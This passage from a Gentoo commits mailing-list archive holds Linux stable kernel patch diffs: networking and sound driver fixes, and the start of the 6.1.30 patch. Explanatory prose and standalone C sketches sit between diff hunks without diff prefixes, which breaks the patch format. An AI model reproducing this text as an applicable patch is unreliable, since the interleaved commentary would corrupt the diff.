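		/* old pattern: allocate, then discover what was really granted */
		void *p = malloc(want);
		size_t usable = malloc_usable_size(p);	/* the ksize() analogue */

		/* new pattern: compute the rounded size first, allocate exactly that */
		size_t rounded = 1;
		while (rounded < want)
			rounded <<= 1;
		void *q = malloc(rounded);

		printf("want=%zu usable=%zu rounded=%zu\n", want, usable, rounded);
		free(p);
		free(q);
		return 0;
	}
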
+diff --git a/net/ipv4/udplite.c b/net/ipv4/udplite.c
+index e0c9cc39b81e3..56d94d23b9e0f 100644
+--- a/net/ipv4/udplite.c
++++ b/net/ipv4/udplite.c
+@@ -64,6 +64,8 @@ struct proto 	udplite_prot = {
+ 	.per_cpu_fw_alloc  = &udp_memory_per_cpu_fw_alloc,
+ 
+ 	.sysctl_mem	   = sysctl_udp_mem,
++	.sysctl_wmem_offset = offsetof(struct net, ipv4.sysctl_udp_wmem_min),
++	.sysctl_rmem_offset = offsetof(struct net, ipv4.sysctl_udp_rmem_min),
+ 	.obj_size	   = sizeof(struct udp_sock),
+ 	.h.udp_table	   = &udplite_table,
+ };
+diff --git a/net/ipv6/exthdrs_core.c b/net/ipv6/exthdrs_core.c
+index da46c42846765..49e31e4ae7b7f 100644
+--- a/net/ipv6/exthdrs_core.c
++++ b/net/ipv6/exthdrs_core.c
+@@ -143,6 +143,8 @@ int ipv6_find_tlv(const struct sk_buff *skb, int offset, int type)
+ 			optlen = 1;
+ 			break;
+ 		default:
++			if (len < 2)
++				goto bad;
+ 			optlen = nh[offset + 1] + 2;
+ 			if (optlen > len)
+ 				goto bad;
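
The added check guards the read of nh[offset + 1]: a generic TLV option needs at least two bytes (type and length) remaining before its length byte can be dereferenced, otherwise a truncated extension header is read past its end. A simplified standalone sketch of the loop with the check in place (Pad1 kept, other special option types omitted):

	#include <stdio.h>

	static int find_tlv(const unsigned char *nh, int off, int len, int type)
	{
		while (len > 0) {
			int optlen;

			if (nh[off] == type)
				return off;
			if (nh[off] == 0) {		/* Pad1: one byte, no length */
				optlen = 1;
			} else {
				if (len < 2)		/* the check this hunk adds */
					return -1;
				optlen = nh[off + 1] + 2;
				if (optlen > len)
					return -1;
			}
			off += optlen;
			len -= optlen;
		}
		return -1;
	}

	int main(void)
	{
		const unsigned char opts[] = { 0x05, 0x02, 0xaa, 0xbb, 0x01 };

		printf("found at %d\n", find_tlv(opts, 0, sizeof(opts), 0x01));
		return 0;
	}
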
+diff --git a/net/ipv6/udplite.c b/net/ipv6/udplite.c
+index 67eaf3ca14cea..3bab0cc136977 100644
+--- a/net/ipv6/udplite.c
++++ b/net/ipv6/udplite.c
+@@ -60,6 +60,8 @@ struct proto udplitev6_prot = {
+ 	.per_cpu_fw_alloc  = &udp_memory_per_cpu_fw_alloc,
+ 
+ 	.sysctl_mem	   = sysctl_udp_mem,
++	.sysctl_wmem_offset = offsetof(struct net, ipv4.sysctl_udp_wmem_min),
++	.sysctl_rmem_offset = offsetof(struct net, ipv4.sysctl_udp_rmem_min),
+ 	.obj_size	   = sizeof(struct udp6_sock),
+ 	.h.udp_table	   = &udplite_table,
+ };
+diff --git a/net/sctp/transport.c b/net/sctp/transport.c
+index b3f1a91e9a079..2990365c2f2c9 100644
+--- a/net/sctp/transport.c
++++ b/net/sctp/transport.c
+@@ -324,9 +324,12 @@ bool sctp_transport_pl_recv(struct sctp_transport *t)
+ 		t->pl.probe_size += SCTP_PL_BIG_STEP;
+ 	} else if (t->pl.state == SCTP_PL_SEARCH) {
+ 		if (!t->pl.probe_high) {
+-			t->pl.probe_size = min(t->pl.probe_size + SCTP_PL_BIG_STEP,
+-					       SCTP_MAX_PLPMTU);
+-			return false;
++			if (t->pl.probe_size < SCTP_MAX_PLPMTU) {
++				t->pl.probe_size = min(t->pl.probe_size + SCTP_PL_BIG_STEP,
++						       SCTP_MAX_PLPMTU);
++				return false;
++			}
++			t->pl.probe_high = SCTP_MAX_PLPMTU;
+ 		}
+ 		t->pl.probe_size += SCTP_PL_MIN_STEP;
+ 		if (t->pl.probe_size >= t->pl.probe_high) {
+@@ -341,7 +344,7 @@ bool sctp_transport_pl_recv(struct sctp_transport *t)
+ 	} else if (t->pl.state == SCTP_PL_COMPLETE) {
+ 		/* Raise probe_size again after 30 * interval in Search Complete */
+ 		t->pl.state = SCTP_PL_SEARCH; /* Search Complete -> Search */
+-		t->pl.probe_size += SCTP_PL_MIN_STEP;
++		t->pl.probe_size = min(t->pl.probe_size + SCTP_PL_MIN_STEP, SCTP_MAX_PLPMTU);
+ 	}
+ 
+ 	return t->pl.state == SCTP_PL_COMPLETE;
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e8018b0fb7676..02d1daae77397 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1987,8 +1987,10 @@ static int smc_listen_rdma_init(struct smc_sock *new_smc,
+ 		return rc;
+ 
+ 	/* create send buffer and rmb */
+-	if (smc_buf_create(new_smc, false))
++	if (smc_buf_create(new_smc, false)) {
++		smc_conn_abort(new_smc, ini->first_contact_local);
+ 		return SMC_CLC_DECL_MEM;
++	}
+ 
+ 	return 0;
+ }
+@@ -2204,8 +2206,11 @@ static void smc_find_rdma_v2_device_serv(struct smc_sock *new_smc,
+ 	smcr_version = ini->smcr_version;
+ 	ini->smcr_version = SMC_V2;
+ 	rc = smc_listen_rdma_init(new_smc, ini);
+-	if (!rc)
++	if (!rc) {
+ 		rc = smc_listen_rdma_reg(new_smc, ini->first_contact_local);
++		if (rc)
++			smc_conn_abort(new_smc, ini->first_contact_local);
++	}
+ 	if (!rc)
+ 		return;
+ 	ini->smcr_version = smcr_version;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index 0208dfb353456..f82f43573a159 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -127,6 +127,7 @@ static int smcr_lgr_conn_assign_link(struct smc_connection *conn, bool first)
+ 	int i, j;
+ 
+ 	/* do link balancing */
++	conn->lnk = NULL;	/* reset conn->lnk first */
+ 	for (i = 0; i < SMC_LINKS_PER_LGR_MAX; i++) {
+ 		struct smc_link *lnk = &conn->lgr->lnk[i];
+ 
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index c8321de341eea..6debf4fd42d4e 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -927,11 +927,10 @@ static void __rpc_execute(struct rpc_task *task)
+ 		 */
+ 		do_action = task->tk_action;
+ 		/* Tasks with an RPC error status should exit */
+-		if (do_action != rpc_exit_task &&
++		if (do_action && do_action != rpc_exit_task &&
+ 		    (status = READ_ONCE(task->tk_rpc_status)) != 0) {
+ 			task->tk_status = status;
+-			if (do_action != NULL)
+-				do_action = rpc_exit_task;
++			do_action = rpc_exit_task;
+ 		}
+ 		/* Callbacks override all actions */
+ 		if (task->tk_callback) {
+diff --git a/sound/hda/hdac_device.c b/sound/hda/hdac_device.c
+index b7e5032b61c97..bfd8585776767 100644
+--- a/sound/hda/hdac_device.c
++++ b/sound/hda/hdac_device.c
+@@ -611,7 +611,7 @@ EXPORT_SYMBOL_GPL(snd_hdac_power_up_pm);
+ int snd_hdac_keep_power_up(struct hdac_device *codec)
+ {
+ 	if (!atomic_inc_not_zero(&codec->in_pm)) {
+-		int ret = pm_runtime_get_if_in_use(&codec->dev);
++		int ret = pm_runtime_get_if_active(&codec->dev, true);
+ 		if (!ret)
+ 			return -1;
+ 		if (ret < 0)
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index 099722ebaed83..748a3c40966e9 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -1306,6 +1306,7 @@ static const struct snd_pci_quirk ca0132_quirks[] = {
+ 	SND_PCI_QUIRK(0x1458, 0xA026, "Gigabyte G1.Sniper Z97", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x1458, 0xA036, "Gigabyte GA-Z170X-Gaming 7", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x3842, 0x1038, "EVGA X99 Classified", QUIRK_R3DI),
++	SND_PCI_QUIRK(0x3842, 0x104b, "EVGA X299 Dark", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x3842, 0x1055, "EVGA Z390 DARK", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x1102, 0x0013, "Recon3D", QUIRK_R3D),
+ 	SND_PCI_QUIRK(0x1102, 0x0018, "Recon3D", QUIRK_R3D),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index c757607177368..379f216158ab4 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11699,6 +11699,8 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x32cb, "Lenovo ThinkCentre M70", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cf, "Lenovo ThinkCentre M950", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32f7, "Lenovo ThinkCentre M90", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x3321, "Lenovo ThinkCentre M70 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x331b, "Lenovo ThinkCentre M90 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3742, "Lenovo TianYi510Pro-14IOB", ALC897_FIXUP_HEADSET_MIC_PIN2),
+ 	SND_PCI_QUIRK(0x17aa, 0x38af, "Lenovo Ideapad Y550P", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Ideapad Y550", ALC662_FIXUP_IDEAPAD),
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index d1d9d8d2df2d2..9f59518005a5f 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -745,6 +745,8 @@ static int tx_macro_put_dec_enum(struct snd_kcontrol *kcontrol,
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+ 
+ 	val = ucontrol->value.enumerated.item[0];
++	if (val >= e->items)
++		return -EINVAL;
+ 
+ 	switch (e->reg) {
+ 	case CDC_TX_INP_MUX_ADC_MUX0_CFG0:
+@@ -771,6 +773,9 @@ static int tx_macro_put_dec_enum(struct snd_kcontrol *kcontrol,
+ 	case CDC_TX_INP_MUX_ADC_MUX7_CFG0:
+ 		mic_sel_reg = CDC_TX7_TX_PATH_CFG0;
+ 		break;
++	default:
++		dev_err(component->dev, "Error in configuration!!\n");
++		return -EINVAL;
+ 	}
+ 
+ 	if (val != 0) {
+diff --git a/sound/soc/codecs/rt5682-i2c.c b/sound/soc/codecs/rt5682-i2c.c
+index 2935c1bb81f3f..5bc46b0417866 100644
+--- a/sound/soc/codecs/rt5682-i2c.c
++++ b/sound/soc/codecs/rt5682-i2c.c
+@@ -267,7 +267,9 @@ static int rt5682_i2c_probe(struct i2c_client *i2c)
+ 		ret = devm_request_threaded_irq(&i2c->dev, i2c->irq, NULL,
+ 			rt5682_irq, IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING
+ 			| IRQF_ONESHOT, "rt5682", rt5682);
+-		if (ret)
++		if (!ret)
++			rt5682->irq = i2c->irq;
++		else
+ 			dev_err(&i2c->dev, "Failed to reguest IRQ: %d\n", ret);
+ 	}
+ 
+diff --git a/sound/soc/codecs/rt5682.c b/sound/soc/codecs/rt5682.c
+index 2df95e792900c..a6636ef69f57d 100644
+--- a/sound/soc/codecs/rt5682.c
++++ b/sound/soc/codecs/rt5682.c
+@@ -2957,6 +2957,9 @@ static int rt5682_suspend(struct snd_soc_component *component)
+ 	if (rt5682->is_sdw)
+ 		return 0;
+ 
++	if (rt5682->irq)
++		disable_irq(rt5682->irq);
++
+ 	cancel_delayed_work_sync(&rt5682->jack_detect_work);
+ 	cancel_delayed_work_sync(&rt5682->jd_check_work);
+ 	if (rt5682->hs_jack && (rt5682->jack_type & SND_JACK_HEADSET) == SND_JACK_HEADSET) {
+@@ -3025,6 +3028,9 @@ static int rt5682_resume(struct snd_soc_component *component)
+ 	mod_delayed_work(system_power_efficient_wq,
+ 		&rt5682->jack_detect_work, msecs_to_jiffies(0));
+ 
++	if (rt5682->irq)
++		enable_irq(rt5682->irq);
++
+ 	return 0;
+ }
+ #else
+diff --git a/sound/soc/codecs/rt5682.h b/sound/soc/codecs/rt5682.h
+index 52ff0d9c36c58..5fd798eac40df 100644
+--- a/sound/soc/codecs/rt5682.h
++++ b/sound/soc/codecs/rt5682.h
+@@ -1462,6 +1462,7 @@ struct rt5682_priv {
+ 	int pll_out[RT5682_PLLS];
+ 
+ 	int jack_type;
++	int irq;
+ 	int irq_work_delay_time;
+ };
+ 
+diff --git a/sound/soc/intel/avs/apl.c b/sound/soc/intel/avs/apl.c
+index b8e2b23c9f642..f366478a875de 100644
+--- a/sound/soc/intel/avs/apl.c
++++ b/sound/soc/intel/avs/apl.c
+@@ -173,6 +173,7 @@ static bool apl_lp_streaming(struct avs_dev *adev)
+ {
+ 	struct avs_path *path;
+ 
++	spin_lock(&adev->path_list_lock);
+ 	/* Any gateway without buffer allocated in LP area disqualifies D0IX. */
+ 	list_for_each_entry(path, &adev->path_list, node) {
+ 		struct avs_path_pipeline *ppl;
+@@ -192,11 +193,14 @@ static bool apl_lp_streaming(struct avs_dev *adev)
+ 				if (cfg->copier.dma_type == INVALID_OBJECT_ID)
+ 					continue;
+ 
+-				if (!mod->gtw_attrs.lp_buffer_alloc)
++				if (!mod->gtw_attrs.lp_buffer_alloc) {
++					spin_unlock(&adev->path_list_lock);
+ 					return false;
++				}
+ 			}
+ 		}
+ 	}
++	spin_unlock(&adev->path_list_lock);
+ 
+ 	return true;
+ }
+diff --git a/sound/soc/intel/avs/messages.h b/sound/soc/intel/avs/messages.h
+index c0f90dba9af89..b82b2483ef9b3 100644
+--- a/sound/soc/intel/avs/messages.h
++++ b/sound/soc/intel/avs/messages.h
+@@ -611,7 +611,7 @@ enum avs_channel_config {
+ 	AVS_CHANNEL_CONFIG_DUAL_MONO = 9,
+ 	AVS_CHANNEL_CONFIG_I2S_DUAL_STEREO_0 = 10,
+ 	AVS_CHANNEL_CONFIG_I2S_DUAL_STEREO_1 = 11,
+-	AVS_CHANNEL_CONFIG_4_CHANNEL = 12,
++	AVS_CHANNEL_CONFIG_7_1 = 12,
+ 	AVS_CHANNEL_CONFIG_INVALID
+ };
+ 
+diff --git a/tools/testing/selftests/memfd/fuse_test.c b/tools/testing/selftests/memfd/fuse_test.c
+index be675002f918a..93798c8c5d54b 100644
+--- a/tools/testing/selftests/memfd/fuse_test.c
++++ b/tools/testing/selftests/memfd/fuse_test.c
+@@ -22,6 +22,7 @@
+ #include <linux/falloc.h>
+ #include <fcntl.h>
+ #include <linux/memfd.h>
++#include <linux/types.h>
+ #include <sched.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index 70ea8798b1f60..e5db2a2a67df9 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -68,7 +68,7 @@ setup()
+ cleanup()
+ {
+ 	$IP link del dev dummy0 &> /dev/null
+-	ip netns del ns1
++	ip netns del ns1 &> /dev/null
+ 	ip netns del ns2 &> /dev/null
+ }
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-24 17:05 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-24 17:05 UTC (permalink / raw
  To: gentoo-commits

commit:     6bb774fdcc66711b827740662669a6ad8381d739
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 24 17:05:27 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 24 17:05:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6bb774fd

Linux patch 6.1.30

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1029_linux-6.1.30.patch | 18622 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 18626 insertions(+)

diff --git a/0000_README b/0000_README
index 9c3afe15..5f7fb2f0 100644
--- a/0000_README
+++ b/0000_README
@@ -159,6 +159,10 @@ Patch:  1028_linux-6.1.29.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.29
 
+Patch:  1029_linux-6.1.30.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.30
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1029_linux-6.1.30.patch b/1029_linux-6.1.30.patch
new file mode 100644
index 00000000..9de71c25
--- /dev/null
+++ b/1029_linux-6.1.30.patch
@@ -0,0 +1,18622 @@
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 808ade4cc008a..55492fea44276 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -170,6 +170,8 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | NVIDIA         | Carmel Core     | N/A             | NVIDIA_CARMEL_CNP_ERRATUM   |
+ +----------------+-----------------+-----------------+-----------------------------+
++| NVIDIA         | T241 GICv3/4.x  | T241-FABRIC-4   | N/A                         |
+++----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Freescale/NXP  | LS2080A/LS1043A | A-008585        | FSL_ERRATUM_A008585         |
+ +----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml b/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml
+index 9b31f864e071e..71364c6081ff5 100644
+--- a/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml
++++ b/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml
+@@ -32,7 +32,7 @@ properties:
+     maxItems: 1
+ 
+   iommus:
+-    maxItems: 1
++    maxItems: 4
+ 
+   power-domains:
+     maxItems: 1
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+index 6c5b4783812ae..2fa1759e74d95 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+@@ -65,6 +65,18 @@ properties:
+       Indicates if the DSI controller is driving a panel which needs
+       2 DSI links.
+ 
++  qcom,master-dsi:
++    type: boolean
++    description: |
++      Indicates if the DSI controller is the master DSI controller when
++      qcom,dual-dsi-mode enabled.
++
++  qcom,sync-dual-dsi:
++    type: boolean
++    description: |
++      Indicates if the DSI controller needs to sync the other DSI controller
++      with MIPI DCS commands when qcom,dual-dsi-mode enabled.
++
+   assigned-clocks:
+     maxItems: 2
+     description: |
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 350d7e3ba94f9..301b9ba6af79f 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -9362,7 +9362,7 @@ F:	drivers/net/wireless/intersil/hostap/
+ HP COMPAQ TC1100 TABLET WMI EXTRAS DRIVER
+ L:	platform-driver-x86@vger.kernel.org
+ S:	Orphan
+-F:	drivers/platform/x86/tc1100-wmi.c
++F:	drivers/platform/x86/hp/tc1100-wmi.c
+ 
+ HPET:	High Precision Event Timers driver
+ M:	Clemens Ladisch <clemens@ladisch.de>
+@@ -11858,7 +11858,7 @@ M:	Eric Piel <eric.piel@tremplin-utc.net>
+ S:	Maintained
+ F:	Documentation/misc-devices/lis3lv02d.rst
+ F:	drivers/misc/lis3lv02d/
+-F:	drivers/platform/x86/hp_accel.c
++F:	drivers/platform/x86/hp/hp_accel.c
+ 
+ LIST KUNIT TEST
+ M:	David Gow <davidgow@google.com>
+diff --git a/Makefile b/Makefile
+index f02f6e1ac5743..aeb58c7a4baa4 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 29
++SUBLEVEL = 30
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-sa1100/jornada720_ssp.c b/arch/arm/mach-sa1100/jornada720_ssp.c
+index 1dbe98948ce30..9627c4cf3e41d 100644
+--- a/arch/arm/mach-sa1100/jornada720_ssp.c
++++ b/arch/arm/mach-sa1100/jornada720_ssp.c
+@@ -1,5 +1,5 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/**
++/*
+  *  arch/arm/mac-sa1100/jornada720_ssp.c
+  *
+  *  Copyright (C) 2006/2007 Kristoffer Ericson <Kristoffer.Ericson@gmail.com>
+@@ -26,6 +26,7 @@ static unsigned long jornada_ssp_flags;
+ 
+ /**
+  * jornada_ssp_reverse - reverses input byte
++ * @byte: input byte to reverse
+  *
+  * we need to reverse all data we receive from the mcu due to its physical location
+  * returns : 01110111 -> 11101110
+@@ -46,6 +47,7 @@ EXPORT_SYMBOL(jornada_ssp_reverse);
+ 
+ /**
+  * jornada_ssp_byte - waits for ready ssp bus and sends byte
++ * @byte: input byte to transmit
+  *
+  * waits for fifo buffer to clear and then transmits, if it doesn't then we will
+  * timeout after <timeout> rounds. Needs mcu running before its called.
+@@ -77,6 +79,7 @@ EXPORT_SYMBOL(jornada_ssp_byte);
+ 
+ /**
+  * jornada_ssp_inout - decide if input is command or trading byte
++ * @byte: input byte to send (may be %TXDUMMY)
+  *
+  * returns : (jornada_ssp_byte(byte)) on success
+  *         : %-ETIMEDOUT on timeout failure
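
The hunks above are kernel-doc repairs: "/**" is reserved for kernel-doc blocks, each parameter gets an @name line, and constants are marked like %TXDUMMY. A self-contained sketch of a helper documented in that style, implementing the bit reversal the first comment describes (names are illustrative, not the driver's):

	#include <stdio.h>

	/**
	 * reverse_byte - reverses the bits of the input byte
	 * @byte: input byte to reverse
	 *
	 * Returns the bit-reversed value, e.g. 01110111 -> 11101110.
	 */
	static unsigned char reverse_byte(unsigned char byte)
	{
		unsigned char out = 0;
		int i;

		for (i = 0; i < 8; i++)
			if (byte & (1 << i))
				out |= (unsigned char)(1 << (7 - i));
		return out;
	}

	int main(void)
	{
		printf("%#x -> %#x\n", 0x77, reverse_byte(0x77));
		return 0;
	}
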
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi b/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi
+index ae08556b2ef2f..1499d5d8bbc04 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi
+@@ -1299,7 +1299,6 @@
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+ 	dr_mode = "otg";
+-	snps,dis_u3_susphy_quirk;
+ 	usb-role-switch;
+ 	status = "okay";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 67b87915d8224..9f89100542018 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -2979,8 +2979,11 @@
+ 				interrupts = <0 131 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&hsusb_phy1>, <&ssusb_phy_0>;
+ 				phy-names = "usb2-phy", "usb3-phy";
++				snps,hird-threshold = /bits/ 8 <0>;
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
++				snps,is-utmi-l1-suspend;
++				tx-fifo-resize;
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index f982594896796..74c6832e05985 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -731,8 +731,6 @@
+ 	vdd-1.3-rfa-supply = <&vreg_l17a_1p3>;
+ 	vdd-3.3-ch0-supply = <&vreg_l25a_3p3>;
+ 	vdd-3.3-ch1-supply = <&vreg_l23a_3p3>;
+-
+-	qcom,snoc-host-cap-skip-quirk;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/kernel/mte.c b/arch/arm64/kernel/mte.c
+index 84a085d536f84..e20af03b4cdfa 100644
+--- a/arch/arm64/kernel/mte.c
++++ b/arch/arm64/kernel/mte.c
+@@ -72,13 +72,10 @@ void mte_sync_tags(pte_t old_pte, pte_t pte)
+ 		return;
+ 
+ 	/* if PG_mte_tagged is set, tags have already been initialised */
+-	for (i = 0; i < nr_pages; i++, page++) {
+-		if (!page_mte_tagged(page)) {
++	for (i = 0; i < nr_pages; i++, page++)
++		if (!page_mte_tagged(page))
+ 			mte_sync_page_tags(page, old_pte, check_swap,
+ 					   pte_is_tagged);
+-			set_page_mte_tagged(page);
+-		}
+-	}
+ 
+ 	/* ensure the tags are visible before the PTE is set */
+ 	smp_wmb();
+diff --git a/arch/parisc/include/asm/pdc.h b/arch/parisc/include/asm/pdc.h
+index fcbcf9a96c111..77622558bf651 100644
+--- a/arch/parisc/include/asm/pdc.h
++++ b/arch/parisc/include/asm/pdc.h
+@@ -80,6 +80,7 @@ int pdc_do_firm_test_reset(unsigned long ftc_bitmap);
+ int pdc_do_reset(void);
+ int pdc_soft_power_info(unsigned long *power_reg);
+ int pdc_soft_power_button(int sw_control);
++int pdc_soft_power_button_panic(int sw_control);
+ void pdc_io_reset(void);
+ void pdc_io_reset_devices(void);
+ int pdc_iodc_getc(void);
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index bd325f2b5349e..3e051a973e9b2 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -1232,15 +1232,18 @@ int __init pdc_soft_power_info(unsigned long *power_reg)
+ }
+ 
+ /*
+- * pdc_soft_power_button - Control the soft power button behaviour
+- * @sw_control: 0 for hardware control, 1 for software control 
++ * pdc_soft_power_button{_panic} - Control the soft power button behaviour
++ * @sw_control: 0 for hardware control, 1 for software control
+  *
+  *
+  * This PDC function places the soft power button under software or
+  * hardware control.
+- * Under software control the OS may control to when to allow to shut 
+- * down the system. Under hardware control pressing the power button 
++ * Under software control the OS may control to when to allow to shut
++ * down the system. Under hardware control pressing the power button
+  * powers off the system immediately.
++ *
++ * The _panic version relies on spin_trylock to prevent deadlock
++ * on panic path.
+  */
+ int pdc_soft_power_button(int sw_control)
+ {
+@@ -1254,6 +1257,22 @@ int pdc_soft_power_button(int sw_control)
+ 	return retval;
+ }
+ 
++int pdc_soft_power_button_panic(int sw_control)
++{
++	int retval;
++	unsigned long flags;
++
++	if (!spin_trylock_irqsave(&pdc_lock, flags)) {
++		pr_emerg("Couldn't enable soft power button\n");
++		return -EBUSY; /* ignored by the panic notifier */
++	}
++
++	retval = mem_pdc_call(PDC_SOFT_POWER, PDC_SOFT_POWER_ENABLE, __pa(pdc_result), sw_control);
++	spin_unlock_irqrestore(&pdc_lock, flags);
++
++	return retval;
++}
++
+ /*
+  * pdc_io_reset - Hack to avoid overlapping range registers of Bridges devices.
+  * Primarily a problem on T600 (which parisc-linux doesn't support) but
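
The _panic variant exists because panic notifiers can run on a CPU that already holds pdc_lock; a blocking spin_lock_irqsave() there could deadlock, while spin_trylock_irqsave() fails fast and lets the notifier continue. A standalone userspace analogue of the pattern using a pthread mutex (error value kept as -EBUSY to mirror the hunk; build with -pthread):

	#include <errno.h>
	#include <pthread.h>
	#include <stdio.h>

	static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

	static int call_firmware_panic_safe(void)
	{
		if (pthread_mutex_trylock(&lock) != 0)
			return -EBUSY;	/* ignored by the panic notifier */

		/* ... the firmware call would happen here ... */
		pthread_mutex_unlock(&lock);
		return 0;
	}

	int main(void)
	{
		pthread_mutex_lock(&lock);	/* simulate the lock held at panic time */
		printf("held: %d\n", call_firmware_panic_safe());
		pthread_mutex_unlock(&lock);
		printf("free: %d\n", call_firmware_panic_safe());
		return 0;
	}
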
+diff --git a/arch/powerpc/kernel/dma-iommu.c b/arch/powerpc/kernel/dma-iommu.c
+index 038ce8d9061d1..8920862ffd791 100644
+--- a/arch/powerpc/kernel/dma-iommu.c
++++ b/arch/powerpc/kernel/dma-iommu.c
+@@ -144,7 +144,7 @@ static bool dma_iommu_bypass_supported(struct device *dev, u64 mask)
+ /* We support DMA to/from any memory page via the iommu */
+ int dma_iommu_dma_supported(struct device *dev, u64 mask)
+ {
+-	struct iommu_table *tbl = get_iommu_table_base(dev);
++	struct iommu_table *tbl;
+ 
+ 	if (dev_is_pci(dev) && dma_iommu_bypass_supported(dev, mask)) {
+ 		/*
+@@ -162,6 +162,8 @@ int dma_iommu_dma_supported(struct device *dev, u64 mask)
+ 		return 1;
+ 	}
+ 
++	tbl = get_iommu_table_base(dev);
++
+ 	if (!tbl) {
